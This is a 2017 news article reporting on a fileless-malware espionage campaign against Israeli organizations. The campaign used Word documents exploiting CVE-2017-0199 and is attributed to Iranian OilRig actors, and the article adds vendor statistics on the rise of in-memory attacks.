New cyber espionage campaign targets Israeli organizations
Get a powerful Linux Dual-Core dedicated server for less than $2.67 a day!
April 28, 2017
A new cyber espionage campaign is now targeting Israeli organizations that relies on fileless malware, a hacker's new tactic that's becoming a growing menace in cyber space.
The attack vector was delivered through several compromised email accounts at Ben Gurion University and were then sent to multiple targets across all of Israel.
To be sure, malware from a 'fileless' attack is so-called because it resides solely in memory, with commands delivered directly from the web.
The approach simply means that there's no executable files on disk and no artefacts for conventional computer forensic analysis to pick up, rendering the attacks stealthy, if not downright invisible.
On any given day, malware infections still generate lots of potential suspicious network traffic and across multiple paths.
Investigators at Israeli cybersecurity firm Morphisec say the attacks originated in Iran and was the the work of the same hackers responsible for the recent OilRig malware campaign.
The attack vector was delivered via Microsoft Word documents that exploited a former zero-day security vulnerability in Word (bulletin number CVE-2017-0199) by actually reusing an existing PoC that was published immediately after the patch release.
Microsoft released the security patch for the vulnerability in question on April 11, but many organizations have not yet deployed the update. The delivered documents installed a fileless variant of the Helminth Trojan agent.
But it's rapidly getting worse, and such fileless attacks are on the rise. Security vendors Carbon Black recently reported a 33.2 percent rise in severe non-malware attacks in Q4 2016 compared to Q1. In-memory attacks doubled in comparison to the infection rates of file-based vectors, according to a study by another end point security vendor, SentinelOne.
The general use of the fileless malware tactic, first spotted more than five years ago but only becoming really fashionable since mid-2016, extends beyond state-sponsored cyber-espionage.
For example, Kaspersky Lab warned earlier this month about fileless attacks against banking networks. The attack was geared towards robbing money from ATMs.
Kaspersky Lab asserted: "Fileless malware is being increasingly used in various attacks by both targeted threat actors and cybercriminals in general, helping to avoid detection and make forensic investigations more difficult. We have found examples in the lateral movement tools used in the Shamoon attacks, in attacks against Eastern European banks, and in the hands of a number of other APT actors."
Source: Kaspersky Labs.
Get a powerful Linux Dual-Core dedicated server for less than $2.67 a day!Tweet Share on Twitter.